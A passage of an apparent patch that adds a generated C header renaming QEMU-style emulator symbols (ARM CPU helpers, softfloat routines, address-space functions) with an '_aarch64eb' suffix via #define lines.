aa64_daif_access aa64_daif_access_aarch64eb +#define aa64_daif_write aa64_daif_write_aarch64eb +#define aa64_dczid_read aa64_dczid_read_aarch64eb +#define aa64_fpcr_read aa64_fpcr_read_aarch64eb +#define aa64_fpcr_write aa64_fpcr_write_aarch64eb +#define aa64_fpsr_read aa64_fpsr_read_aarch64eb +#define aa64_fpsr_write aa64_fpsr_write_aarch64eb +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_aarch64eb +#define aa64_zva_access aa64_zva_access_aarch64eb +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_aarch64eb +#define aarch64_restore_sp aarch64_restore_sp_aarch64eb +#define aarch64_save_sp aarch64_save_sp_aarch64eb +#define accel_find accel_find_aarch64eb +#define accel_init_machine accel_init_machine_aarch64eb +#define accel_type accel_type_aarch64eb +#define access_with_adjusted_size access_with_adjusted_size_aarch64eb +#define add128 add128_aarch64eb +#define add16_sat add16_sat_aarch64eb +#define add16_usat add16_usat_aarch64eb +#define add192 add192_aarch64eb +#define add8_sat add8_sat_aarch64eb +#define add8_usat add8_usat_aarch64eb +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_aarch64eb +#define add_cpreg_to_list add_cpreg_to_list_aarch64eb +#define addFloat128Sigs addFloat128Sigs_aarch64eb +#define addFloat32Sigs addFloat32Sigs_aarch64eb +#define addFloat64Sigs addFloat64Sigs_aarch64eb +#define addFloatx80Sigs addFloatx80Sigs_aarch64eb +#define add_qemu_ldst_label add_qemu_ldst_label_aarch64eb +#define address_space_access_valid address_space_access_valid_aarch64eb +#define address_space_destroy address_space_destroy_aarch64eb +#define address_space_destroy_dispatch address_space_destroy_dispatch_aarch64eb +#define address_space_get_flatview address_space_get_flatview_aarch64eb +#define address_space_init address_space_init_aarch64eb +#define address_space_init_dispatch address_space_init_dispatch_aarch64eb +#define address_space_lookup_region address_space_lookup_region_aarch64eb +#define address_space_map address_space_map_aarch64eb +#define address_space_read address_space_read_aarch64eb +#define address_space_rw address_space_rw_aarch64eb +#define address_space_translate address_space_translate_aarch64eb +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_aarch64eb +#define address_space_translate_internal address_space_translate_internal_aarch64eb +#define address_space_unmap address_space_unmap_aarch64eb +#define address_space_update_topology address_space_update_topology_aarch64eb +#define address_space_update_topology_pass address_space_update_topology_pass_aarch64eb +#define address_space_write address_space_write_aarch64eb +#define addrrange_contains addrrange_contains_aarch64eb +#define addrrange_end addrrange_end_aarch64eb +#define addrrange_equal addrrange_equal_aarch64eb +#define addrrange_intersection addrrange_intersection_aarch64eb +#define addrrange_intersects addrrange_intersects_aarch64eb +#define addrrange_make addrrange_make_aarch64eb +#define adjust_endianness adjust_endianness_aarch64eb +#define all_helpers all_helpers_aarch64eb +#define alloc_code_gen_buffer alloc_code_gen_buffer_aarch64eb +#define alloc_entry alloc_entry_aarch64eb +#define always_true always_true_aarch64eb +#define arm1026_initfn arm1026_initfn_aarch64eb +#define arm1136_initfn arm1136_initfn_aarch64eb +#define arm1136_r2_initfn arm1136_r2_initfn_aarch64eb +#define arm1176_initfn arm1176_initfn_aarch64eb +#define arm11mpcore_initfn arm11mpcore_initfn_aarch64eb +#define arm926_initfn arm926_initfn_aarch64eb +#define arm946_initfn arm946_initfn_aarch64eb +#define arm_ccnt_enabled arm_ccnt_enabled_aarch64eb +#define arm_cp_read_zero arm_cp_read_zero_aarch64eb +#define arm_cp_reset_ignore arm_cp_reset_ignore_aarch64eb +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_aarch64eb +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_aarch64eb +#define arm_cpu_finalizefn arm_cpu_finalizefn_aarch64eb +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_aarch64eb +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_aarch64eb +#define arm_cpu_initfn arm_cpu_initfn_aarch64eb +#define arm_cpu_list arm_cpu_list_aarch64eb +#define cpu_loop_exit cpu_loop_exit_aarch64eb +#define arm_cpu_post_init arm_cpu_post_init_aarch64eb +#define arm_cpu_realizefn arm_cpu_realizefn_aarch64eb +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_aarch64eb +#define arm_cpu_register_types arm_cpu_register_types_aarch64eb +#define cpu_resume_from_signal cpu_resume_from_signal_aarch64eb +#define arm_cpus arm_cpus_aarch64eb +#define arm_cpu_set_pc arm_cpu_set_pc_aarch64eb +#define arm_cp_write_ignore arm_cp_write_ignore_aarch64eb +#define arm_current_el arm_current_el_aarch64eb +#define arm_dc_feature arm_dc_feature_aarch64eb +#define arm_debug_excp_handler arm_debug_excp_handler_aarch64eb +#define arm_debug_target_el arm_debug_target_el_aarch64eb +#define arm_el_is_aa64 arm_el_is_aa64_aarch64eb +#define arm_env_get_cpu arm_env_get_cpu_aarch64eb +#define arm_excp_target_el arm_excp_target_el_aarch64eb +#define arm_excp_unmasked arm_excp_unmasked_aarch64eb +#define arm_feature arm_feature_aarch64eb +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_aarch64eb +#define gen_intermediate_code gen_intermediate_code_aarch64eb +#define gen_intermediate_code_pc gen_intermediate_code_pc_aarch64eb +#define arm_gen_test_cc arm_gen_test_cc_aarch64eb +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_aarch64eb +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_aarch64eb +#define arm_handle_psci_call arm_handle_psci_call_aarch64eb +#define arm_is_psci_call arm_is_psci_call_aarch64eb +#define arm_is_secure arm_is_secure_aarch64eb +#define arm_is_secure_below_el3 arm_is_secure_below_el3_aarch64eb +#define arm_ldl_code arm_ldl_code_aarch64eb +#define arm_lduw_code arm_lduw_code_aarch64eb +#define arm_log_exception arm_log_exception_aarch64eb +#define arm_reg_read arm_reg_read_aarch64eb +#define arm_reg_reset arm_reg_reset_aarch64eb +#define arm_reg_write arm_reg_write_aarch64eb +#define restore_state_to_opc restore_state_to_opc_aarch64eb +#define arm_rmode_to_sf arm_rmode_to_sf_aarch64eb +#define arm_singlestep_active arm_singlestep_active_aarch64eb +#define tlb_fill tlb_fill_aarch64eb +#define tlb_flush tlb_flush_aarch64eb +#define tlb_flush_page tlb_flush_page_aarch64eb +#define tlb_set_page tlb_set_page_aarch64eb +#define arm_translate_init arm_translate_init_aarch64eb +#define arm_v7m_class_init arm_v7m_class_init_aarch64eb +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_aarch64eb +#define ats_access ats_access_aarch64eb +#define ats_write ats_write_aarch64eb +#define bad_mode_switch bad_mode_switch_aarch64eb +#define bank_number bank_number_aarch64eb +#define bitmap_zero_extend bitmap_zero_extend_aarch64eb +#define bp_wp_matches bp_wp_matches_aarch64eb +#define breakpoint_invalidate breakpoint_invalidate_aarch64eb +#define build_page_bitmap build_page_bitmap_aarch64eb +#define bus_add_child bus_add_child_aarch64eb +#define bus_class_init bus_class_init_aarch64eb +#define bus_info bus_info_aarch64eb +#define bus_unparent bus_unparent_aarch64eb +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_aarch64eb +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_aarch64eb +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_aarch64eb +#define call_recip_estimate call_recip_estimate_aarch64eb +#define can_merge can_merge_aarch64eb +#define capacity_increase capacity_increase_aarch64eb +#define ccsidr_read ccsidr_read_aarch64eb +#define check_ap check_ap_aarch64eb +#define check_breakpoints check_breakpoints_aarch64eb +#define check_watchpoints check_watchpoints_aarch64eb +#define cho cho_aarch64eb +#define clear_bit clear_bit_aarch64eb +#define clz32 clz32_aarch64eb +#define clz64 clz64_aarch64eb +#define cmp_flatrange_addr cmp_flatrange_addr_aarch64eb +#define code_gen_alloc code_gen_alloc_aarch64eb +#define commonNaNToFloat128 commonNaNToFloat128_aarch64eb +#define commonNaNToFloat16 commonNaNToFloat16_aarch64eb +#define commonNaNToFloat32 commonNaNToFloat32_aarch64eb +#define commonNaNToFloat64 commonNaNToFloat64_aarch64eb +#define commonNaNToFloatx80 commonNaNToFloatx80_aarch64eb +#define compute_abs_deadline compute_abs_deadline_aarch64eb +#define cond_name cond_name_aarch64eb +#define configure_accelerator configure_accelerator_aarch64eb +#define container_get container_get_aarch64eb +#define container_info container_info_aarch64eb +#define container_register_types container_register_types_aarch64eb +#define contextidr_write contextidr_write_aarch64eb +#define core_log_global_start core_log_global_start_aarch64eb +#define core_log_global_stop core_log_global_stop_aarch64eb +#define core_memory_listener core_memory_listener_aarch64eb +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_aarch64eb +#define cortex_a15_initfn cortex_a15_initfn_aarch64eb +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_aarch64eb +#define cortex_a8_initfn cortex_a8_initfn_aarch64eb +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_aarch64eb +#define cortex_a9_initfn cortex_a9_initfn_aarch64eb +#define cortex_m3_initfn cortex_m3_initfn_aarch64eb +#define count_cpreg count_cpreg_aarch64eb +#define countLeadingZeros32 countLeadingZeros32_aarch64eb +#define countLeadingZeros64 countLeadingZeros64_aarch64eb +#define cp_access_ok cp_access_ok_aarch64eb +#define cpacr_write cpacr_write_aarch64eb +#define cpreg_field_is_64bit cpreg_field_is_64bit_aarch64eb +#define cp_reginfo cp_reginfo_aarch64eb +#define cpreg_key_compare cpreg_key_compare_aarch64eb +#define cpreg_make_keylist cpreg_make_keylist_aarch64eb +#define cp_reg_reset cp_reg_reset_aarch64eb +#define cpreg_to_kvm_id cpreg_to_kvm_id_aarch64eb +#define cpsr_read cpsr_read_aarch64eb +#define cpsr_write cpsr_write_aarch64eb +#define cptype_valid cptype_valid_aarch64eb +#define cpu_abort cpu_abort_aarch64eb +#define cpu_arm_exec cpu_arm_exec_aarch64eb +#define cpu_arm_gen_code cpu_arm_gen_code_aarch64eb +#define cpu_arm_init cpu_arm_init_aarch64eb +#define cpu_breakpoint_insert cpu_breakpoint_insert_aarch64eb +#define cpu_breakpoint_remove cpu_breakpoint_remove_aarch64eb +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_aarch64eb +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_aarch64eb +#define cpu_can_do_io cpu_can_do_io_aarch64eb +#define cpu_can_run cpu_can_run_aarch64eb +#define cpu_class_init cpu_class_init_aarch64eb +#define cpu_common_class_by_name cpu_common_class_by_name_aarch64eb +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_aarch64eb +#define cpu_common_get_arch_id cpu_common_get_arch_id_aarch64eb +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_aarch64eb +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_aarch64eb +#define cpu_common_has_work cpu_common_has_work_aarch64eb +#define cpu_common_initfn cpu_common_initfn_aarch64eb +#define cpu_common_noop cpu_common_noop_aarch64eb +#define cpu_common_parse_features cpu_common_parse_features_aarch64eb +#define cpu_common_realizefn cpu_common_realizefn_aarch64eb +#define cpu_common_reset cpu_common_reset_aarch64eb +#define cpu_dump_statistics cpu_dump_statistics_aarch64eb +#define cpu_exec_init cpu_exec_init_aarch64eb +#define cpu_flush_icache_range cpu_flush_icache_range_aarch64eb +#define cpu_gen_init cpu_gen_init_aarch64eb +#define cpu_get_clock cpu_get_clock_aarch64eb +#define cpu_get_real_ticks cpu_get_real_ticks_aarch64eb +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_aarch64eb +#define cpu_handle_debug_exception cpu_handle_debug_exception_aarch64eb +#define cpu_handle_guest_debug cpu_handle_guest_debug_aarch64eb +#define cpu_inb cpu_inb_aarch64eb +#define cpu_inl cpu_inl_aarch64eb +#define cpu_interrupt cpu_interrupt_aarch64eb +#define cpu_interrupt_handler cpu_interrupt_handler_aarch64eb +#define cpu_inw cpu_inw_aarch64eb +#define cpu_io_recompile cpu_io_recompile_aarch64eb +#define cpu_is_stopped cpu_is_stopped_aarch64eb +#define cpu_ldl_code cpu_ldl_code_aarch64eb +#define cpu_ldub_code cpu_ldub_code_aarch64eb +#define cpu_lduw_code cpu_lduw_code_aarch64eb +#define cpu_memory_rw_debug cpu_memory_rw_debug_aarch64eb +#define cpu_mmu_index cpu_mmu_index_aarch64eb +#define cpu_outb cpu_outb_aarch64eb +#define cpu_outl cpu_outl_aarch64eb +#define cpu_outw cpu_outw_aarch64eb +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_aarch64eb +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_aarch64eb +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_aarch64eb +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_aarch64eb +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_aarch64eb +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_aarch64eb +#define cpu_physical_memory_map cpu_physical_memory_map_aarch64eb +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_aarch64eb +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_aarch64eb +#define cpu_physical_memory_rw cpu_physical_memory_rw_aarch64eb +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_aarch64eb +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_aarch64eb +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_aarch64eb +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_aarch64eb +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_aarch64eb +#define cpu_register cpu_register_aarch64eb +#define cpu_register_types cpu_register_types_aarch64eb +#define cpu_restore_state cpu_restore_state_aarch64eb +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_aarch64eb +#define cpu_single_step cpu_single_step_aarch64eb +#define cpu_tb_exec cpu_tb_exec_aarch64eb +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_aarch64eb +#define cpu_to_be64 cpu_to_be64_aarch64eb +#define cpu_to_le32 cpu_to_le32_aarch64eb +#define cpu_to_le64 cpu_to_le64_aarch64eb +#define cpu_type_info cpu_type_info_aarch64eb +#define cpu_unassigned_access cpu_unassigned_access_aarch64eb +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_aarch64eb +#define cpu_watchpoint_insert cpu_watchpoint_insert_aarch64eb +#define cpu_watchpoint_remove cpu_watchpoint_remove_aarch64eb +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_aarch64eb +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_aarch64eb +#define crc32c_table crc32c_table_aarch64eb +#define create_new_memory_mapping create_new_memory_mapping_aarch64eb +#define csselr_write csselr_write_aarch64eb +#define cto32 cto32_aarch64eb +#define ctr_el0_access ctr_el0_access_aarch64eb +#define ctz32 ctz32_aarch64eb +#define ctz64 ctz64_aarch64eb +#define dacr_write dacr_write_aarch64eb +#define dbgbcr_write dbgbcr_write_aarch64eb +#define dbgbvr_write dbgbvr_write_aarch64eb +#define dbgwcr_write dbgwcr_write_aarch64eb +#define dbgwvr_write dbgwvr_write_aarch64eb +#define debug_cp_reginfo debug_cp_reginfo_aarch64eb +#define debug_frame debug_frame_aarch64eb +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_aarch64eb +#define define_arm_cp_regs define_arm_cp_regs_aarch64eb +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_aarch64eb +#define define_debug_regs define_debug_regs_aarch64eb +#define define_one_arm_cp_reg define_one_arm_cp_reg_aarch64eb +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_aarch64eb +#define deposit32 deposit32_aarch64eb +#define deposit64 deposit64_aarch64eb +#define deregister_tm_clones deregister_tm_clones_aarch64eb +#define device_class_base_init device_class_base_init_aarch64eb +#define device_class_init device_class_init_aarch64eb +#define device_finalize device_finalize_aarch64eb +#define device_get_realized device_get_realized_aarch64eb +#define device_initfn device_initfn_aarch64eb +#define device_post_init device_post_init_aarch64eb +#define device_reset device_reset_aarch64eb +#define device_set_realized device_set_realized_aarch64eb +#define device_type_info device_type_info_aarch64eb +#define disas_arm_insn disas_arm_insn_aarch64eb +#define disas_coproc_insn disas_coproc_insn_aarch64eb +#define disas_dsp_insn disas_dsp_insn_aarch64eb +#define disas_iwmmxt_insn disas_iwmmxt_insn_aarch64eb +#define disas_neon_data_insn disas_neon_data_insn_aarch64eb +#define disas_neon_ls_insn disas_neon_ls_insn_aarch64eb +#define disas_thumb2_insn disas_thumb2_insn_aarch64eb +#define disas_thumb_insn disas_thumb_insn_aarch64eb +#define disas_vfp_insn disas_vfp_insn_aarch64eb +#define disas_vfp_v8_insn disas_vfp_v8_insn_aarch64eb +#define do_arm_semihosting do_arm_semihosting_aarch64eb +#define do_clz16 do_clz16_aarch64eb +#define do_clz8 do_clz8_aarch64eb +#define do_constant_folding do_constant_folding_aarch64eb +#define do_constant_folding_2 do_constant_folding_2_aarch64eb +#define do_constant_folding_cond do_constant_folding_cond_aarch64eb +#define do_constant_folding_cond2 do_constant_folding_cond2_aarch64eb +#define do_constant_folding_cond_32 do_constant_folding_cond_32_aarch64eb +#define do_constant_folding_cond_64 do_constant_folding_cond_64_aarch64eb +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_aarch64eb +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_aarch64eb +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_aarch64eb +#define do_ssat do_ssat_aarch64eb +#define do_usad do_usad_aarch64eb +#define do_usat do_usat_aarch64eb +#define do_v7m_exception_exit do_v7m_exception_exit_aarch64eb +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_aarch64eb +#define dummy_func dummy_func_aarch64eb +#define dummy_section dummy_section_aarch64eb +#define _DYNAMIC _DYNAMIC_aarch64eb +#define _edata _edata_aarch64eb +#define _end _end_aarch64eb +#define end_list end_list_aarch64eb +#define eq128 eq128_aarch64eb +#define ErrorClass_lookup ErrorClass_lookup_aarch64eb +#define error_copy error_copy_aarch64eb +#define error_exit error_exit_aarch64eb +#define error_get_class error_get_class_aarch64eb +#define error_get_pretty error_get_pretty_aarch64eb +#define error_setg_file_open error_setg_file_open_aarch64eb +#define estimateDiv128To64 estimateDiv128To64_aarch64eb +#define estimateSqrt32 estimateSqrt32_aarch64eb +#define excnames excnames_aarch64eb +#define excp_is_internal excp_is_internal_aarch64eb +#define extended_addresses_enabled extended_addresses_enabled_aarch64eb +#define extended_mpu_ap_bits extended_mpu_ap_bits_aarch64eb +#define extract32 extract32_aarch64eb +#define extract64 extract64_aarch64eb +#define extractFloat128Exp extractFloat128Exp_aarch64eb +#define extractFloat128Frac0 extractFloat128Frac0_aarch64eb +#define extractFloat128Frac1 extractFloat128Frac1_aarch64eb +#define extractFloat128Sign extractFloat128Sign_aarch64eb +#define extractFloat16Exp extractFloat16Exp_aarch64eb +#define extractFloat16Frac extractFloat16Frac_aarch64eb +#define extractFloat16Sign extractFloat16Sign_aarch64eb +#define extractFloat32Exp extractFloat32Exp_aarch64eb +#define extractFloat32Frac extractFloat32Frac_aarch64eb +#define extractFloat32Sign extractFloat32Sign_aarch64eb +#define extractFloat64Exp extractFloat64Exp_aarch64eb +#define extractFloat64Frac extractFloat64Frac_aarch64eb +#define extractFloat64Sign extractFloat64Sign_aarch64eb +#define extractFloatx80Exp extractFloatx80Exp_aarch64eb +#define extractFloatx80Frac extractFloatx80Frac_aarch64eb +#define extractFloatx80Sign extractFloatx80Sign_aarch64eb +#define fcse_write fcse_write_aarch64eb +#define find_better_copy find_better_copy_aarch64eb +#define find_default_machine find_default_machine_aarch64eb +#define find_desc_by_name find_desc_by_name_aarch64eb +#define find_first_bit find_first_bit_aarch64eb +#define find_paging_enabled_cpu find_paging_enabled_cpu_aarch64eb +#define find_ram_block find_ram_block_aarch64eb +#define find_ram_offset find_ram_offset_aarch64eb +#define find_string find_string_aarch64eb +#define find_type find_type_aarch64eb +#define _fini _fini_aarch64eb +#define flatrange_equal flatrange_equal_aarch64eb +#define flatview_destroy flatview_destroy_aarch64eb +#define flatview_init flatview_init_aarch64eb +#define flatview_insert flatview_insert_aarch64eb +#define flatview_lookup flatview_lookup_aarch64eb +#define flatview_ref flatview_ref_aarch64eb +#define flatview_simplify flatview_simplify_aarch64eb +#define flatview_unref flatview_unref_aarch64eb +#define float128_add float128_add_aarch64eb +#define float128_compare float128_compare_aarch64eb +#define float128_compare_internal float128_compare_internal_aarch64eb +#define float128_compare_quiet float128_compare_quiet_aarch64eb +#define float128_default_nan float128_default_nan_aarch64eb +#define float128_div float128_div_aarch64eb +#define float128_eq float128_eq_aarch64eb +#define float128_eq_quiet float128_eq_quiet_aarch64eb +#define float128_is_quiet_nan float128_is_quiet_nan_aarch64eb +#define float128_is_signaling_nan float128_is_signaling_nan_aarch64eb +#define float128_le float128_le_aarch64eb +#define float128_le_quiet float128_le_quiet_aarch64eb +#define float128_lt float128_lt_aarch64eb +#define float128_lt_quiet float128_lt_quiet_aarch64eb +#define float128_maybe_silence_nan float128_maybe_silence_nan_aarch64eb +#define float128_mul float128_mul_aarch64eb +#define float128_rem float128_rem_aarch64eb +#define float128_round_to_int float128_round_to_int_aarch64eb +#define float128_scalbn float128_scalbn_aarch64eb +#define float128_sqrt float128_sqrt_aarch64eb +#define float128_sub float128_sub_aarch64eb +#define float128ToCommonNaN float128ToCommonNaN_aarch64eb +#define float128_to_float32 float128_to_float32_aarch64eb +#define float128_to_float64 float128_to_float64_aarch64eb +#define float128_to_floatx80 float128_to_floatx80_aarch64eb +#define float128_to_int32 float128_to_int32_aarch64eb +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_aarch64eb +#define float128_to_int64 float128_to_int64_aarch64eb +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_aarch64eb +#define float128_unordered float128_unordered_aarch64eb +#define float128_unordered_quiet float128_unordered_quiet_aarch64eb +#define float16_default_nan float16_default_nan_aarch64eb +#define float16_is_quiet_nan float16_is_quiet_nan_aarch64eb +#define float16_is_signaling_nan float16_is_signaling_nan_aarch64eb +#define float16_maybe_silence_nan float16_maybe_silence_nan_aarch64eb +#define float16ToCommonNaN float16ToCommonNaN_aarch64eb +#define float16_to_float32 float16_to_float32_aarch64eb +#define float16_to_float64 float16_to_float64_aarch64eb +#define float32_abs float32_abs_aarch64eb +#define float32_add float32_add_aarch64eb +#define float32_chs float32_chs_aarch64eb +#define float32_compare float32_compare_aarch64eb +#define float32_compare_internal float32_compare_internal_aarch64eb +#define float32_compare_quiet float32_compare_quiet_aarch64eb +#define float32_default_nan float32_default_nan_aarch64eb +#define float32_div float32_div_aarch64eb +#define float32_eq float32_eq_aarch64eb +#define float32_eq_quiet float32_eq_quiet_aarch64eb +#define float32_exp2 float32_exp2_aarch64eb +#define float32_exp2_coefficients float32_exp2_coefficients_aarch64eb +#define float32_is_any_nan float32_is_any_nan_aarch64eb +#define float32_is_infinity float32_is_infinity_aarch64eb +#define float32_is_neg float32_is_neg_aarch64eb +#define float32_is_quiet_nan float32_is_quiet_nan_aarch64eb +#define float32_is_signaling_nan float32_is_signaling_nan_aarch64eb +#define float32_is_zero float32_is_zero_aarch64eb +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_aarch64eb +#define float32_le float32_le_aarch64eb +#define float32_le_quiet float32_le_quiet_aarch64eb +#define float32_log2 float32_log2_aarch64eb +#define float32_lt float32_lt_aarch64eb +#define float32_lt_quiet float32_lt_quiet_aarch64eb +#define float32_max float32_max_aarch64eb +#define float32_maxnum float32_maxnum_aarch64eb +#define float32_maxnummag float32_maxnummag_aarch64eb +#define float32_maybe_silence_nan float32_maybe_silence_nan_aarch64eb +#define float32_min float32_min_aarch64eb +#define float32_minmax float32_minmax_aarch64eb +#define float32_minnum float32_minnum_aarch64eb +#define float32_minnummag float32_minnummag_aarch64eb +#define float32_mul float32_mul_aarch64eb +#define float32_muladd float32_muladd_aarch64eb +#define float32_rem float32_rem_aarch64eb +#define float32_round_to_int float32_round_to_int_aarch64eb +#define float32_scalbn float32_scalbn_aarch64eb +#define float32_set_sign float32_set_sign_aarch64eb +#define float32_sqrt float32_sqrt_aarch64eb +#define float32_squash_input_denormal float32_squash_input_denormal_aarch64eb +#define float32_sub float32_sub_aarch64eb +#define float32ToCommonNaN float32ToCommonNaN_aarch64eb +#define float32_to_float128 float32_to_float128_aarch64eb +#define float32_to_float16 float32_to_float16_aarch64eb +#define float32_to_float64 float32_to_float64_aarch64eb +#define float32_to_floatx80 float32_to_floatx80_aarch64eb +#define float32_to_int16 float32_to_int16_aarch64eb +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_aarch64eb +#define float32_to_int32 float32_to_int32_aarch64eb +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_aarch64eb +#define float32_to_int64 float32_to_int64_aarch64eb +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_aarch64eb +#define float32_to_uint16 float32_to_uint16_aarch64eb +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_aarch64eb +#define float32_to_uint32 float32_to_uint32_aarch64eb +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_aarch64eb +#define float32_to_uint64 float32_to_uint64_aarch64eb +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_aarch64eb +#define float32_unordered float32_unordered_aarch64eb +#define float32_unordered_quiet float32_unordered_quiet_aarch64eb +#define float64_abs float64_abs_aarch64eb +#define float64_add float64_add_aarch64eb +#define float64_chs float64_chs_aarch64eb +#define float64_compare float64_compare_aarch64eb +#define float64_compare_internal float64_compare_internal_aarch64eb +#define float64_compare_quiet float64_compare_quiet_aarch64eb +#define float64_default_nan float64_default_nan_aarch64eb +#define float64_div float64_div_aarch64eb +#define float64_eq float64_eq_aarch64eb +#define float64_eq_quiet float64_eq_quiet_aarch64eb +#define float64_is_any_nan float64_is_any_nan_aarch64eb +#define float64_is_infinity float64_is_infinity_aarch64eb +#define float64_is_neg float64_is_neg_aarch64eb +#define float64_is_quiet_nan float64_is_quiet_nan_aarch64eb +#define float64_is_signaling_nan float64_is_signaling_nan_aarch64eb +#define float64_is_zero float64_is_zero_aarch64eb +#define float64_le float64_le_aarch64eb +#define float64_le_quiet float64_le_quiet_aarch64eb +#define float64_log2 float64_log2_aarch64eb +#define float64_lt float64_lt_aarch64eb +#define float64_lt_quiet float64_lt_quiet_aarch64eb +#define float64_max float64_max_aarch64eb +#define float64_maxnum float64_maxnum_aarch64eb +#define float64_maxnummag float64_maxnummag_aarch64eb +#define float64_maybe_silence_nan float64_maybe_silence_nan_aarch64eb +#define float64_min float64_min_aarch64eb +#define float64_minmax float64_minmax_aarch64eb +#define float64_minnum float64_minnum_aarch64eb +#define float64_minnummag float64_minnummag_aarch64eb +#define float64_mul float64_mul_aarch64eb +#define float64_muladd float64_muladd_aarch64eb +#define float64_rem float64_rem_aarch64eb +#define float64_round_to_int float64_round_to_int_aarch64eb +#define float64_scalbn float64_scalbn_aarch64eb +#define float64_set_sign float64_set_sign_aarch64eb +#define float64_sqrt float64_sqrt_aarch64eb +#define float64_squash_input_denormal float64_squash_input_denormal_aarch64eb +#define float64_sub float64_sub_aarch64eb +#define float64ToCommonNaN float64ToCommonNaN_aarch64eb +#define float64_to_float128 float64_to_float128_aarch64eb +#define float64_to_float16 float64_to_float16_aarch64eb +#define float64_to_float32 float64_to_float32_aarch64eb +#define float64_to_floatx80 float64_to_floatx80_aarch64eb +#define float64_to_int16 float64_to_int16_aarch64eb +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_aarch64eb +#define float64_to_int32 float64_to_int32_aarch64eb +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_aarch64eb +#define float64_to_int64 float64_to_int64_aarch64eb +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_aarch64eb +#define float64_to_uint16 float64_to_uint16_aarch64eb +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_aarch64eb +#define float64_to_uint32 float64_to_uint32_aarch64eb +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_aarch64eb +#define float64_to_uint64 float64_to_uint64_aarch64eb +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_aarch64eb +#define float64_trunc_to_int float64_trunc_to_int_aarch64eb +#define float64_unordered float64_unordered_aarch64eb +#define float64_unordered_quiet float64_unordered_quiet_aarch64eb +#define float_raise float_raise_aarch64eb +#define floatx80_add floatx80_add_aarch64eb +#define floatx80_compare floatx80_compare_aarch64eb +#define floatx80_compare_internal floatx80_compare_internal_aarch64eb +#define floatx80_compare_quiet floatx80_compare_quiet_aarch64eb +#define floatx80_default_nan floatx80_default_nan_aarch64eb +#define floatx80_div floatx80_div_aarch64eb +#define floatx80_eq floatx80_eq_aarch64eb +#define floatx80_eq_quiet floatx80_eq_quiet_aarch64eb +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_aarch64eb +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_aarch64eb +#define floatx80_le floatx80_le_aarch64eb +#define floatx80_le_quiet floatx80_le_quiet_aarch64eb +#define floatx80_lt floatx80_lt_aarch64eb +#define floatx80_lt_quiet floatx80_lt_quiet_aarch64eb +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_aarch64eb +#define floatx80_mul floatx80_mul_aarch64eb +#define floatx80_rem floatx80_rem_aarch64eb +#define floatx80_round_to_int floatx80_round_to_int_aarch64eb +#define floatx80_scalbn floatx80_scalbn_aarch64eb +#define floatx80_sqrt floatx80_sqrt_aarch64eb +#define 